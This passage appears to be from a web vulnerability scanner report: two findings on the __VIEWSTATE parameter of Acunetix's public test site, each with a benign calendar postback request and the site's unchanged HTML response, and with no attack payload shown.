style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8562&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAu8wOatsIZGRkE%2FoM0NRVz1fYsJkCLfuBjQa2pZw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK0mciNBwK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMWg6eEtP7NjTj3uvueCqx9MOe4r4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:16 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAu8wOatsIZGRkE/oM0NRVz1fYsJkCLfuBjQa2pZw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK0mciNBwK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMWg6eEtP7NjTj3uvueCqx9MOe4r4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:White" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8550&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAxs%2BgYNsIZGRkVGdtRaJu3QMXD17yR40O%2BH4UwZQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKLseysBQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMb8oQrObs7Taq2FTLEY4S5Wk2wYo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:33 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAxs+gYNsIZGRkVGdtRaJu3QMXD17yR40O+H4UwZQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKLseysBQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMb8oQrObs7Taq2FTLEY4S5Wk2wYo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:White" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" 